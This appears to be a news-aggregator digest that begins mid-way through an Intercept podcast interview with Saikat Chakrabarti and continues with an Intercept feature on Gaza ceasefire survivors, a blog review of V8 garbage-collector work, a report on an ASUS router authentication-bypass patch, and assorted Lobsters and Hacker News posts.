And so the way we introduced the Green New Deal was AOC did a sit-in in Speaker Pelosi’s office on her first day in D.C., which was this huge act of political courage. She joined [the] Sunrise Movement, and then we did inside-outside organizing with Sunrise. Sunrise was doing sit-ins while I was calling up the staffers on the inside to get them onto the Green New Deal. And then we did that with the presidential candidates. And Sunrise would go into town halls while I was calling up the, you know, the staffers on the campaigns for president.

And the result of that was every single person running for president had to respond. And they did. They responded with their own ambitious plans for climate. Even Joe Biden, who responded with Build Back Better. And that turned into [the] Inflation Reduction Act, which wasn’t everything I wanted, but it was the largest investment in climate change and clean manufacturing in the history of this country.

So that’s the kind of experience I bring. So if you’re someone who thinks we need to tackle these structural problems and have someone who’s going to creatively work to actually push through new ideas, that’s what I’m running for.

AL: Closing out, I’m going to ask you about Nancy Pelosi, the person you’re running to replace. How do you view her legacy?

SC: I’ve been pretty respectful of her. You know, I do think she has had a long career, and she’s done a lot of good stuff in that time. I think especially when she first came in, she was kind of this fearless voice calling attention to the AIDS epidemic that was ravaging San Francisco at the time, and it wasn’t necessarily popular countrywide. But it worked: she managed to get help and money into the district and provide real relief for people.

You know, I think, I would say like I’m also honestly struck by the level of leadership it took for her to step down, because that is something that we don’t see a lot of people in D.C. do. I think it’s going to result in people remembering her for what she did, rather than for her just being in there too long, like people like RBG and Dianne Feinstein.

And the reason I ran this race in the first place was, I was really saying, you know, Speaker Pelosi, former Speaker Pelosi, she’s had this long career, she had some skills, but we are in this era where we need new ideas, we need new leaders, we need people who are going to push the party in a new direction. I just don’t think that’s her role or what she was necessarily in a position to be able to do. So, yeah, I’ve got a lot of respect for her, but I’m glad she was able to make the decision to pass the torch.

AL: Do you want her endorsement?

SC: That’s a decision for her to make. I mean, look, I’m going to run the race I run. And this is how I always run any race: it’s on me to prove myself and prove that this campaign is worth it. And so anybody who wants to be a part of that campaign, anybody who wants to endorse, who thinks they see themselves in this, is welcome to.

AL: I understand what you’re saying, but can you explain if she decided to endorse you, why you would welcome it if you were previously running against her?

SC: I mean, I don’t, I just don’t think it’s going to be a problem, because I’m pretty sure she’s not going to offer an endorsement given that I just primaried her. I mean, come on.

AL: The thought exercise. Let’s do the, let’s do the thought exercise. I’m just try, I’m trying to get at this tension between having criticism for someone and still having respect for them and how you see sort of—

SC: Because it’s a criticism, it’s a criticism of a system, right? It’s a criticism of the Democratic Party. So if somebody realizes that, “Oh, actually Saikat was right,” I mean, this is really getting outlandish. But say Nancy Pelosi suddenly says, “OK. You know what, Saikat, you were right to challenge me. You were right that we need real change in the party. You were right that we need new ideas. So I’d like to endorse you.” I will always accept people changing their minds and coming over. I’m never going to say no just because I disagreed with you in the past. It’s not that I’ll never accept anything you say. A key thing here is I’m not going to change who I am or what I’m running on to get anybody’s endorsement.

I’m going to run on what I’m running on. I’m going to run the way I’m running, still calling out Hakeem Jeffries and Chuck Schumer and all the leadership that’s failing us right now. And so if you think that’s the race you want to be a part of, great. But if you think you’re going to change me to get an endorsement, sorry, it’s not going to happen.

AL: You’ve been very openly saying Hakeem Jeffries should be primaried. What’s your take on Schumer? Where do you stand on him particularly after this shutdown showdown?

SC: I mean, he should absolutely be primaried. I mean, there’s no question. Chuck Schumer has completely failed as the leader of Senate Democrats. This is— He’s getting too many chances, and he’s completely out of step with the party, and frankly, I think he’s damaging the party, especially when it came to something like the Zohran race in New York, where Schumer, he never endorsed. As far as I know, he didn’t even say if he voted for him.

AL: Saikat Chakrabarti, thank you for joining me on the Intercept Briefing.

SC: Thank you. Thanks for having me.

AL: That does it for this episode of The Intercept Briefing.

We want to hear from you. What do you want to see more coverage of? Are you taking political action? Are there organizing efforts in your community you want to shout out? Shoot us an email at podcasts@theintercept.com. Or leave us a voice mail at 530-POD-CAST. That’s 530-763-2278.

This episode was produced by Laura Flynn and Andrew Stelzer with editorial support from Maia Hibbett. Sumi Aggarwal is our executive producer. Ben Muessig is our editor-in-chief. Chelsey B. Coombs is our social and video producer. Desiree Adib is our booking producer. Fei Liu is our product and design manager. Nara Shin is our copy-editor. Will Stanton mixed our show. Legal review by David Bralow.

Slip Stream provided our theme music.

If you want to support our work, you can go to theintercept.com/join. Your donation, no matter the amount, makes a real difference. If you haven’t already, please subscribe to The Intercept Briefing wherever you listen to podcasts. And leave us a rating or a review; it helps other listeners find our reporting.

Until next time, I’m Akela Lacy.

What are you doing this weekend?

Lobsters
lobste.rs
2025-11-14 10:54:20
Feel free to tell what you plan on doing this weekend and even ask for help or feedback. Please keep in mind it’s more than OK to do nothing at all too!...
Original Article

Helping my bonus son and his fiancee to move apartments.

You know how in sitcoms someone is at the end of their DIY rope and has to call some father figure for help? Turns out I am that father figure now, and I have huge impostor syndrome.

Gazans Reflect on Surviving to See a Ceasefire: "Sometimes We Envy the Martyrs"

Intercept
theintercept.com
2025-11-14 10:00:00
Living through genocide means inhabiting a “city of ghosts,” surrounded by rubble and memories of all that's been lost. The post Gazans Reflect on Surviving to See a Ceasefire: “Sometimes We Envy the Martyrs” appeared first on The Intercept....
Original Article
Nooh Al-shaghnobi sits on the rubble of his home in Gaza. Photo: Nooh Al-shaghnobi

For Gaza’s 2 million survivors, the word “ceasefire” no longer sounds like peace; it sounds like a trick of language, another fragile pause between massacres. After two years of genocide that erased entire families, neighborhoods, and futures, many in Gaza met this fragile truce not with celebration but disbelief, exhaustion, and fear. One Palestinian described the current moment as a “pause between two pains”: the horror they lived through and the uncertainty that has followed.

I spoke with six people from Gaza — a filmmaker, a photojournalist, an architect, a former spokesperson for the Gaza Municipality, a civil worker, and a survivor — who offer a piercing look into what it means to first live through a genocide and then to try to live through its aftermath. Their words reveal a haunting truth: The war may have paused, but it doesn’t feel truly over.

“No Triumph in Surviving”

Hala Asfour, a 24-year-old filmmaker and photographer, said her initial reaction to the ceasefire was pure disbelief. “I didn’t feel joy,” she says. “Just this heavy, oppressive feeling, like my heart couldn’t absorb what had happened. I feel a great void. Even a week later, I still see the war everywhere: in people’s faces, in the children, in the echo of planes and drones that will never leave my memory.” For Asfour, this ceasefire is a pause, not peace. She calls it a “pause between two pains,” the agony of the genocide they endured and the suffering that continues in its aftermath.

“I still see the war everywhere: in people’s faces, in the children, in the echo of planes and drones.”

Fear is now part of her body, she says, and escaping it seems impossible. “Fear is something I breathe. It’s inside me. Every loud sound, every plane, every buzz — it takes me back to that first explosion of the war. Safety? I don’t feel it at all,” she says. She thinks this ceasefire is a pause that feels like the calm before the storm. She and the people of Gaza lived through many truces before, only to have new, more devastating attacks follow.

Hala Asfour and her fiancé, Mohammad Salama, who was killed in an Israeli airstrike. Photo: Mohammad Salama

For Hala, the war stole much more than homes. It stole her life, herself, her friends, her colleagues, the familiar streets, and everything that looked like her. Hala also lost her fiancé, the Palestinian journalist Mohammad Salama, an Al Jazeera camera operator, in a “double-tap” Israeli strike on Nasser Hospital in Khan Younis, southern Gaza, on August 25, 2025, that also killed five other journalists.

“My wish now is to have one normal day.”

“What I miss most is reassurance,” she says. “The simple feeling of waking up and knowing where your day will go. My wish now is to have one normal day.” This genocide shattered Hala into fragments: a girl who once dreamed and a woman who now struggles to survive.

In Gaza, living becomes the harder choice, more complicated than death itself. “There’s no triumph in surviving. It’s a different kind of pain,” Hala reflects. “You wake up every day carrying the guilt of still being alive when others—people you loved—are gone and didn’t make it till the end. We survived to tell their stories, to honor them, but survival isn’t a privilege.” Slowly, she is learning to breathe again. “Life feels fragmented, but with each child’s laugh, with every sunrise piercing the ruins, we inch toward the possibility of breathing—just a little. Not because we are OK, but because we have to try,” she says.

“I Take More Photos Now Than During the War Itself”

For Anas Zayed Fteiha, a 31-year-old photojournalist with Anadolu Agency, the ceasefire has meant returning to work to document the aftermath of destruction. (Fteiha is currently pursuing legal action against the global publishing company Axel Springer, which he has accused of violating his constitutional rights after one of its tabloids in Germany accused him of being a propagandist for Hamas.)

“The war has not really ended,” he says, noting the breaches in the truce and the ongoing human cost for those left behind. “For mothers who lost their children, for those who lost limbs, for families left homeless—the war never stopped.” But there is a paradoxical relief in the pause. “I feel relief, but fear persists,” Fteiha says. “There’s comfort in not hearing the explosions daily, but the trauma is not gone.”

What was once Anas Zayed Fteiha’s home before the war. Photo: Anas Zayed Fteiha

The people who lost their homes and have nowhere to go are what still haunts Anas after the ceasefire. “This genocide stole many friends and colleagues — and my home, the house I grew up in. Our lives have shattered. Gaza is no longer a livable place,” he says. “Sometimes we envy the martyrs who were killed — they’ve survived the pain and suffering we now face.”

“Gaza is no longer a livable place.”

Even as the ceasefire seems to hold, his work is intensifying, and his camera keeps clicking, capturing shots of survival and grief. The rubble and the lives scattered among it demand documentation. “I take more photos now than during the war itself. There are so many stories that must be told,” he says.

The experience has reshaped his understanding of journalism. “I thought journalism was protected. I thought journalists were respected. In Gaza, I learned the hard truth: Our work is sacred, but we are not protected. We witness, and we are vulnerable,” Anas says.

“We’re Living in a City of Ghosts”

Nooh Al-shaghnobi, 24, a civil defense worker, witnessed the war from the front lines of rescue operations. “I didn’t believe the ceasefire at first,” he says. “Even now, there are breaches and attacks on the so-called ‘yellow zones’ the army designated, and we are still pulling bodies from the rubble. Thousands of bodies remain under the rubble — around 10,000 people. The war didn’t really stop; it just began a new phase.”

“We work with shovels, hammers, and basic tools. To remove one body can take a whole day.”

Al-shaghnobi stayed in Gaza City, on duty, refusing to leave for the south with his family as two years of genocide stretched on. Now, he describes the recovery work as grueling and deeply traumatic. With limited equipment, each recovery is a struggle. “We work with shovels, hammers, and basic tools. To remove one body can take a whole day. And the smell, the sight of decomposed remains, skeletons, skulls, bones — it is impossible to forget. We’re living in a city of ghosts,” he says.

Nooh Al-shaghnobi with his friend Saleh Aljafarawi, left, a journalist who was killed after the ceasefire was announced. Photo: Nooh Al-shaghnobi

Faith and resilience, he says, have been reshaped. “I saw miracles, and I survived each time the Civil Defense team was directly targeted while many of my colleagues were killed. That changed me. But our dreams, our lives, everything is fragile. Any moment, it can vanish,” he says.

“The war didn’t really stop; it just began a new phase.”

Al-shaghnobi’s work makes him confront mortality every day. “Honestly, those who died are the ones who really survived. Yet for those of us who survived, it’s like living in a body without a soul. The war took our loved ones, our homes, and our hope. We’ve learned to live numb. We’ve witnessed so much death and destruction that it has become part of our daily life,” he says.

Even in moments of gratitude, there is also pain. Al-shaghnobi recalled the shock of losing his close friend, the journalist Saleh Aljafarawi, just days after the ceasefire was announced: “We celebrated surviving the massacre, only to see him killed. That’s the reality here — the ceasefire is never complete. The danger never ends.”

“Joy and Fear Mixed Together”

Sara Bsaiso, 32, a human resources manager, echoed this mixture of relief and lingering terror. “When I heard about the ceasefire, it felt like just another headline. We’ve heard about ceasefires before. They never lasted. We didn’t believe this one would either. Only when the bombing truly stops will we believe the war has ended,” she says.

After her family was forced to repeatedly flee south in March 2024 and returned north in February 2025, only to flee again before this most recent ceasefire, Bsaiso carries the exhaustion of displacement. Survival now means facing a new battle: “Sometimes I think those who were killed might be in a better place than us — because what lies ahead is another kind of war: rebuilding from nothing, living without homes, jobs, or normal life.”

Hossam Bsaiso, Sara’s brother, after his release from Israeli prison. Photo: Sara Bsaiso

She reflects on what the war stole. “It took our sense of time, safety, stability, normalcy, minds, lives, homes, jobs,” and, for a time, her brother. Hossam, 36, was imprisoned for over a year in Israeli prisons. She describes the moment when her family found out her brother would be released. “When we saw his name on the list of released prisoners, joy and fear mixed together. We were terrified it might change at the last minute. When we finally saw him before us, safe — it felt like a dream. That was our greatest wish throughout the war,” she says.

“Now we cherish the smallest things: a meal, a bed, a roof over our heads. It’s changed how we think about life and what we prioritize,” she says. Her words capture the quiet appreciation for life in the shadow of destruction. Even as she rebuilds her life, fear lingers, an invisible shadow that no ceasefire can erase. “We survived,” she says, “but the next war could come at any moment.” Despite everything, Sara is trying to find a sense of normalcy. “We must try to breathe again, no matter how much pain we’ve endured. We were born for a reason, and we have to start over with determination and bring life back again,” Bsaiso says.

“All We Can Do Now Is Wait and Pray”

For Walaa Shublaq, a 29-year-old architect and visual artist, the announcement of a ceasefire brought a feeling she hadn’t known in years — a fragile, fleeting joy.

But in the days that followed, the silence was unbearable. The war replayed endlessly in her mind: scene after scene, sound after sound. While the world celebrated, she felt only anger and exhaustion. “I couldn’t even respond to messages of congratulations,” she says. “I was angry — at everyone who could have stopped this bloodshed but didn’t.” For Shublaq, survival has been a burden. It meant abandoning everything and everyone she loved just to stay alive, running from one death to another. “Sometimes we envied the martyrs,” she says. “They had completed their test. But for us who survived, the test continues.”

“I found a kind of freedom — from illusion, from attachment.”

The genocide robbed her not just of her home, but also her sense of self. Her grandmother, her friends, her art, her dreams — all gone. “Now, I no longer mourn the material things I lost; I mourn their meaning,” she says. But amid all that loss, something shifted. “I found a kind of freedom — from illusion, from attachment. I learned that emptiness can only be filled with light,” she says. Among the ruins, she rediscovered fragments of her past, including the signed contract for her first book.

Shublaq still remembers images of the genocide: barefoot children chasing water carts, smoke from wood-fire ovens choking the air, overcrowded donkey carts, and the constant hum of Israeli drones. Now, she wants to forever forget the faces of soldiers, the tanks, and the nights she ran barefoot through the streets to escape death.

As part of the ceasefire deal, more than 1,700 Palestinian prisoners were released from Israeli prisons in October; among them were two of Shublaq’s brothers, Anas and Abdullah. They had been imprisoned for one year and eight months, enduring brutal physical and psychological torture. Another of her brothers, Omar, remains captive. “When my phone rang that night and I heard, ‘Walaa? It’s Anas — your brother,’ I broke down in tears,” she says. “On that day, we waited for my brothers for long hours from the day till we finally met at night at 9 p.m. in absolute darkness. The reunion was bittersweet — joy shadowed by the absence of our third brother.”

“They came back older, heavier with time, but still radiant with life,” she says. When asked about the future, she hesitates. “I’ve lost the ability and the desire to plan,” she says. “All we can do now is wait and pray for a vast and merciful relief.”

“Our Bodies Survived, but Our Souls Didn’t”

Asem Alnabih, 35, a former spokesperson for Gaza Municipality who’s now a correspondent for Al-Araby TV, approached the ceasefire with measured skepticism. “There is no safety,” he says. “The city is still in crisis: water shortages, blocked streets, broken sewage systems. Even after the ceasefire, people are living in a state of collapse, and they are struggling for basic services.” People in Gaza often say, ‘After the war comes another war.’ This is the reality now.

Asem Alnabih, right, and his friend Dr. Refaat Alareer, left, who was later killed in a Dec. 7, 2023, Israeli airstrike. Photo: Asem Alnabih

“The city is still in crisis: water shortages, blocked streets, broken sewage systems.”

Like Al-shaghnobi, Alnabih stayed in Gaza City, never moving to the south. “I slept in a car, a park, a building basement, municipal facilities, friends’ homes, and even with strangers. Displacement became part of daily life,” he says. He describes what home means to him: a place where his family could sit together peacefully, cook, laugh, and feel safe.

For Alnabih, the war has meant the loss of relatives, friends, and normalcy. “It took my closeness to my wife and children — I’ve been separated from them since before the war; they were abroad. It took my nephew Ahmed, my niece Rasha, and my brother-in-law Motaz. It took my dear friend Dr. Refaat Alareer, one of the brightest souls I knew. It left me surrounded by loss, loneliness, and grief.”

He describes survival as a “delayed death.” “Maybe our bodies survived, but our souls didn’t,” he says. Like those of everyone in Gaza, Asem’s dreams have become simple: a peaceful night’s sleep, a meal without fear, and a meeting not torn apart by a bombing. “But my deeper dream is that our sacrifices finally lead to something — that we live free, in our own land, with dignity,” he continues. “Peace is only possible when Palestinians receive their full rights.”

“Peace is only possible when Palestinians receive their full rights.”

The ceasefire may have silenced the bombs, but it has not ended the war — not the one inside people, nor the one against their right to exist. In Gaza, peace is not the sound of quiet skies; it is the dream of justice that remains deferred.

Every survivor now carries the weight of survival, not as triumph, but as testimony. They live among ruins, haunted by what was taken and what could return at any moment. But even here, between grief and persistence, they reach for the smallest signs of life: a child’s laughter, a brother returned home, or the morning sun rising over broken walls.

V8 Garbage Collector

Hacker News
wingolog.org
2025-11-14 09:53:13
Comments...
Original Article

Let’s talk about memory management! Following up on my article about 5 years of developments in V8’s garbage collector, today I’d like to bring that up to date with what went down in V8’s GC over the last couple years.

methodololology

I selected all of the commits to src/heap since my previous roundup. There were 1600 of them, including reverts and relands. I read all of the commit logs, some of the changes, some of the linked bugs, and any design document I could get my hands on. From what I can tell, there have been about 4 FTE from Google over this period, and the commit rate is fairly constant. There are very occasional patches from Igalia, Cloudflare, Intel, and Red Hat, but it’s mostly a Google affair.

Then, by the very rigorous process of, um, just writing things down and thinking about it, I see three big stories for V8’s GC over this time, and I’m going to give them to you with some made-up numbers for how much of the effort was spent on them. Firstly, the effort to improve memory safety via the sandbox: this is around 20% of the time. Secondly, the Oilpan odyssey: maybe 40%. Third, preparation for multiple JavaScript and WebAssembly mutator threads: 20%. Then there are a number of lesser side quests: heuristics wrangling (10%!!!!), and a long list of miscellanea. Let’s take a deeper look at each of these in turn.

the sandbox

There was a nice blog post in June last year summarizing the sandbox effort: basically, the goal is to prevent user-controlled writes from corrupting memory outside the JavaScript heap. We start from the assumption that the user is somehow able to obtain a write-anywhere primitive, and we work to mitigate the effect of such writes. The most fundamental way is to reduce the range of addressable memory, notably by encoding pointers as 32-bit offsets and then ensuring that no host memory is within the addressable virtual memory that an attacker can write. The sandbox also uses some 40-bit offsets for references to larger objects, with similar guarantees. (Yes, a sandbox really does reserve a terabyte of virtual memory).

But there are many, many details. Access to external objects is intermediated via type-checked external pointer tables. Some objects that should never be directly referenced by user code go in a separate “trusted space”, which is outside the sandbox. Then you have read-only spaces, used to allocate data that might be shared between different isolates; you might want multiple cages; there are “shared” variants of the other spaces, for use in shared-memory multi-threading; executable code spaces with embedded object references; and so on and so on. Tweaking, elaborating, and maintaining all of these details has taken a lot of V8 GC developer time.

I think it has paid off, though, because the new development is that V8 has managed to turn on hardware memory protection for the sandbox: sandboxed code is prevented by the hardware from writing memory outside the sandbox.

Leaning into the “attacker can write anything in their address space” threat model has led to some funny patches. For example, sometimes code needs to check flags about the page that an object is on, as part of a write barrier. So some GC-managed metadata needs to be in the sandbox. However, the garbage collector itself, which is outside the sandbox, can’t trust that the metadata is valid. We end up having two copies of state in some cases: in the sandbox, for use by sandboxed code, and outside, for use by the collector.

The best and most amusing instance of this phenomenon is related to integers. Google’s style guide recommends signed integers by default, so you end up with on-heap data structures with int32_t len and such. But if an attacker overwrites a length with a negative number, there are a couple funny things that can happen. The first is a sign-extending conversion to size_t by run-time code, which can lead to sandbox escapes. The other is mistakenly concluding that an object is small, because its length is less than a limit, because it is unexpectedly negative. Good times!

oilpan

It took 10 years for Odysseus to get back from Troy, which is about as long as it has taken for conservative stack scanning to make it from Oilpan into V8 proper. Basically, Oilpan is garbage collection for C++ as used in Blink and Chromium. Sometimes it runs when the stack is empty; then it can be precise. But sometimes it runs when there might be references to GC-managed objects on the stack; in that case it runs conservatively.

Last time I described how V8 would like to add support for generational garbage collection to Oilpan, but to do that, you’d need a way to promote objects to the old generation that is compatible with the ambiguous references visited by conservative stack scanning. I thought V8 had a chance at success with their new mark-sweep nursery, but that seems to have turned out to be a lose relative to the copying nursery. They even tried sticky mark-bit generational collection, but it didn’t work out. Oh well; one good thing about Google is that they seem willing to try projects that have uncertain payoff, though I hope that the hackers involved came through their OKR reviews with their mental health intact.

Instead, V8 added support for pinning to the Scavenger copying nursery implementation. If a page has incoming ambiguous edges, it will be placed in a kind of quarantine area for a while. I am not sure what the difference is between a quarantined page, which logically belongs to the nursery, and a pinned page from the mark-compact old-space; they seem to require similar treatment. In any case, we seem to have settled into a design that was mostly the same as before, but in which any given page can opt out of evacuation-based collection.

What do we get out of all of this? Well, not only can we get generational collection for Oilpan, but also we unlock cheaper, less bug-prone “direct handles” in V8 itself.

The funny thing is that I don’t think any of this is shipping yet; or, if it is, it’s only in a Finch trial to a minority of users or something. I am looking forward with interest to seeing a post from upstream V8 folks; whole doctoral theses have been written on this topic, and it would be a delight to see some actual numbers.

shared-memory multi-threading

JavaScript implementations have had the luxury of single-threadedness: with just one mutator, garbage collection is a lot simpler. But this is ending. I don’t know what the state of shared-memory multi-threading is in JS, but in WebAssembly it seems to be moving apace, and Wasm uses the JS GC. Maybe I am overstating the effort here—probably it doesn’t come to 20%—but wiring this up has been a whole thing.

I will mention just one patch here that I found to be funny. So with pointer compression, an object’s fields are mostly 32-bit words, with the exception of 64-bit doubles, so we can reduce the alignment on most objects to 4 bytes. V8 has had a bug open forever about alignment of double-holding objects that it mostly ignores via unaligned loads.

Thing is, if you have an object visible to multiple threads, and that object might have a 64-bit field, then the field should be 64-bit aligned to prevent tearing during atomic access, which usually means the object should be 64-bit aligned. That is now the case for Wasm structs and arrays in the shared space.

side quests

Right, we’ve covered what to me are the main stories of V8’s GC over the past couple years. But let me mention a few funny side quests that I saw.

the heuristics two-step

This one I find to be hilariousad. Tragicomical. Anyway I am amused. So any real GC has a bunch of heuristics: when to promote an object or a page, when to kick off incremental marking, how to use background threads, when to grow the heap, how to choose whether to make a minor or major collection, when to aggressively reduce memory, how much virtual address space can you reasonably reserve, what to do on hard out-of-memory situations, how to account for off-heap mallocated memory, how to compute whether concurrent marking is going to finish in time or if you need to pause... and V8 needs to do this all in all its many configurations, with pointer compression off or on, on desktop, high-end Android, low-end Android, iOS where everything is weird, something called Starboard which is apparently part of Cobalt which is apparently a whole new platform that Youtube uses to show videos on set-top boxes, on machines with different memory models and operating systems with different interfaces, and on and on and on. Simply tuning the system appears to involve a dose of science, a dose of flailing around and trying things, and a whole cauldron of witchcraft. There appears to be one person whose full-time job it is to implement and monitor metrics on V8 memory performance and implement appropriate tweaks. Good grief!

mutex mayhem

Toon Verwaest noticed that V8 was exhibiting many more context switches on macOS than Safari, and identified V8’s use of platform mutexes as the problem. So he rewrote them to use os_unfair_lock on macOS. Then he implemented adaptive locking on all platforms. Then... removed it all and switched to abseil.

Personally, I am delighted to see this patch series; I wouldn’t have thought that there was juice to squeeze in V8’s use of locking. It gives me hope that I will find a place to do the same in one of my projects :)

ta-ta, third-party heap

It used to be that MMTk was trying to get a number of production language virtual machines to support abstract APIs so that MMTk could slot in a garbage collector implementation. Though this seems to work with OpenJDK, with V8 I think the churn rate and laser-like focus on the browser use-case make an interstitial API abstraction a lose. V8 removed it a little more than a year ago.

fin

So what’s next? I don’t know; it’s been a while since I have been to Munich to drink from the source. That said, shared-memory multithreading and wasm effect handlers will extend the memory management hacker’s full employment act indefinitely, not to mention actually landing and shipping conservative stack scanning. There is a lot to be done in non-browser V8 environments, whether in Node or on the edge, but it is admittedly harder to read the future than the past.

In any case, it was fun taking this look back, and perhaps I will have the opportunity to do this again in a few years. Until then, happy hacking!

ASUS warns of critical auth bypass flaw in DSL series routers

Bleeping Computer
www.bleepingcomputer.com
2025-11-14 09:52:37
ASUS has released new firmware to patch a critical authentication bypass security flaw impacting several DSL series router models. [...]...
Original Article

ASUS has released new firmware to patch a critical authentication bypass security flaw impacting several DSL series router models.

Tracked as CVE-2025-59367, this vulnerability allows remote, unauthenticated attackers to log into unpatched devices exposed online in low-complexity attacks that don't require user interaction.

ASUS has released firmware version 1.1.2.3_1010 to address this vulnerability for DSL-AC51, DSL-N16, and DSL-AC750 router models.

"An authentication bypass vulnerability has been identified in certain DSL series routers, may allow remote attackers to gain unauthorized access into the affected system," ASUS explains .

"ASUS recommends update to the latest firmware to ensure your device remains protected. Download and install the latest firmware version 1.1.2.3_1010 for your device from the ASUS support page or your product page at ASUS Networking."

While the Taiwanese electronics manufacturer only mentions three affected router models, it also provides mitigation measures for users who can't immediately update their devices or have end-of-life models that will not receive firmware updates.

To block potential attacks without patching the routers, users are advised to disable any services accessible from the Internet, including remote access from WAN, port forwarding, DDNS, VPN server, DMZ, port triggering, and FTP.

ASUS also recommends taking additional measures to secure routers and reduce the attack surface, including using complex passwords for the router administration page and wireless networks, regularly checking for security updates and new firmware, and avoiding the reuse of credentials.

While there are no reports of active exploitation, it is strongly recommended to install the latest firmware as soon as possible, as attackers commonly target router flaws to infect devices with botnet malware, which they then use in DDoS attacks.

For instance, in June, CISA added two older security flaws impacting ASUS RT-AX55 (CVE-2023-39780) and ASUS GT-AC2900 (CVE-2021-32030) routers to its catalog of actively exploited vulnerabilities.

As cybersecurity company GreyNoise and French cybersecurity firm Sekoia revealed at the time, "a well-resourced and highly capable adversary" tracked as Vicious Trap used CVE-2023-39780 and CVE-2021-32030 to backdoor thousands of ASUS routers in attacks aimed at building a new botnet, tracked as AyySSHush.

In April, ASUS patched another critical authentication bypass vulnerability (CVE-2025-2492) in a wide range of router models with the AiCloud service enabled.

Audio-primary content for inspiration in software development?

Lobsters
lobste.rs
2025-11-14 09:51:26
Hello fellow beings, First of all, this is really generic, hence why I tagged it as 'programming'. Please say outright if this doesn't belong here. I'm in the situation where I have to drive a few hour (I'm in Europe, so <5h) trips once or twice a month, and I'm looking for some sources with insp...
Original Article

Hello fellow beings,

First of all, this is really generic, hence why I tagged it as 'programming'. Please say outright if this doesn't belong here.

I'm in a situation where I have to drive a few-hour trip (I'm in Europe, so <5h) once or twice a month, and I'm looking for some sources with inspirational content about software development. This driving time usually encourages (or makes room for) creative thinking about new project ideas etc., so I'd love to get more inspiration or new technologies to tinker with.

Is there something like this that would interest someone who likes to learn about niche stuff people are building? Fewer JavaScript frameworks, more offline-first, htmx, creative uses of sqlite, ...

Thinking of it, I'm looking for an audio version of some of the stuff we're seeing on lobsters.

Video content is fine too, as long as it's possible to grasp the content without seeing the slides. Podcasts, YouTube channels, or links to single talks/episodes/... are all good.

This Isn't a Battle

Lobsters
my-notes.dragas.net
2025-11-14 09:23:47
Comments...
Original Article

Published on: by Stefano Marinelli

4 min read

Photo by Dan Meyers on Unsplash

Last night, I read a blog post with great interest.

As is often the case, I found points where I agreed (at least partially) with the author, and others where I completely disagreed. And that’s perfectly fine.

There was one point, however, where my disagreement was total. I'll quote a part of the article here: “The FreeBSD community is...difficult. What I mean by this is that it feels much like the average Linux community in the early 2000s: it looks down on others (in this case Linux users), it appears rather unwelcoming and at times downright toxic. Any time you mention anything vaguely related to Linux you'll inevitably cause somebody to go on a massive rant about how FreeBSD is better than Linux.

It also seems there's a general dislike for change, even if said change is for the better. It feels like a form of "tech boomerism": change is bad because it's not what we're used to, even if the end result is in fact better.”

Frankly, my own experience has been the complete opposite. The communities around the BSD systems are open, friendly, and extremely approachable - though, of course, everyone has their own personality, and toxic people can exist within these communities as well. When I started becoming more active in the BSD community, I received a completely unexpected welcome. The BSD conferences I've attended have the atmosphere of a family, of close friends. No one shows up to boast, but to discuss, to dialogue. In a word: to build .

But I picked up on two details from the excerpt: “mention anything vaguely related to Linux” and “tech boomerism: change is bad because it’s not what we’re used to, even if the end result is in fact better”. This suggested something to me that was later confirmed when the author mentioned the “three firewalls competing with each other” within FreeBSD.

They don’t compete with each other. They coexist - and that’s a completely different thing. This gave me the key to understanding the previous part as well.

This isn't a battle. We aren't in a ruthless commercial arena where different solutions copy each other to get ahead, hoping to attract "users" (better: paying customers) from the other side. And unfortunately, this is something that has been happening in many "mainstream" Open Source communities for a while now. It's a loss of the Open Source philosophy - of doing something for the pleasure of it, to have something different, and to be open to contributions from others, as well as the idea of making what you create public and free. Whether it's with licenses like the GPL or like BSD, MIT, etc., the spirit is to say: “Here it is. If it’s useful to you, take it. If you want, contribute. Otherwise, you can move on; you have no constraints or obligations.”

I often see curious Linux users arriving in BSD communities, and that’s fantastic. The spirit is almost always positive, exploratory: “What can the BSDs do for me?” And sometimes, that turns into, “What can I do for the BSDs?”

But this isn't a religion - you don't need to choose one - and you can use different OSes based on your needs. I happily use Linux, in its various distributions, for some of my workloads. I'm writing this post on a mini PC running openSUSE Tumbleweed, on btrfs, and it works wonderfully. No BSD, at the moment, has adequate support for this machine. I use Linux, and I'm happy with it.

The purpose of the BSDs, like other Open Source operating systems less adopted than Linux and its distributions, isn't to "win" or to "emulate" but to be themselves. So, arriving in a BSD community and saying "but on Linux..." as if it were an example to be followed has, over time, become an attitude that is not well tolerated.

BSD communities value stability - and these communities are much, much smaller than those around projects like Linux and its distributions. It's therefore inevitable that some things will lag behind or that they won't want to embark on projects that might leave something unfinished and malfunctioning. Unfortunately, this sometimes happens anyway. It's better not to seek it out deliberately.

Desktop use for the BSDs has never been a primary focus, particularly for FreeBSD and NetBSD. To judge them on this metric alone is, therefore, extremely limiting and, in a sense, unfair.

So, coming back to the article I read - I understand some of the author's points of view, but calling the FreeBSD community a form of tech "boomers" or "toxic" because it doesn't want to follow Linux's example is, in my opinion, a flawed approach to an autonomous, different operating system.

Let's try to shake off the aggressive, competitive, and monopolistic dynamics when we approach the Open Source world. The plurality of completely autonomous choices is a richness for everyone. Monoculture is always harmful and, in the long run, destructive.

It reminds me of the time when all smartphone manufacturers were trying to copy the iPhone as much as possible. All the phones were the same: either originals or copies, but all extremely similar. How boring.

Ask HN: Is building for the web even worth it now?

Hacker News
news.ycombinator.com
2025-11-14 08:10:44
Comments...
Original Article

Of late, I’ve found my relationship with internet changing. I was here back in the early 2000s and it has always been the first place I go to for entertainment, advice, and work

But increasingly, I find myself completely disengaged with the internet. Every time I see a text post, I start asking myself: is this even a real person? Am I just talking to a bot?

Every time I see a yellow-tinged image on any of my social media feeds, I mentally switch off. I know it was made by AI and I just find it hard to engage with anything AI-made, no matter how good

Same for any AI video that pops up on my feed. It doesn’t just make me scroll past it; it makes me question why I’m even here, and I end up leaving

I know I can’t be the only one. I used to love the internet because it was one place where I could engage with people from all over the world. But now, it feels like I just spend half my energy on figuring out which one is real, which one is AI

The line will eventually blur and as a late 30s guy, I really don’t want to spend any more of my time on earth talking to a bot

As someone who used to create and build for the web, I find myself increasingly disengaged and discouraged. I’m pouring into a rapidly emptying cup

Anyone else feel the same way?

Show HN: Pegma, the free and open-source version of the classic Peg solitaire

Hacker News
pegma.vercel.app
2025-11-14 08:06:41
Comments...
Original Article

Pegma

Discover Pegma, the free and open source version of the classic Peg solitaire! Enjoy the timeless puzzle on your mobile device!

Support the call for Memory Safety incentives in EU cybersecurity policies - Trifecta Tech Foundation

Lobsters
trifectatech.org
2025-11-14 07:22:10
Comments...
Original Article

Improving Europe's cybersecurity posture through memory safety

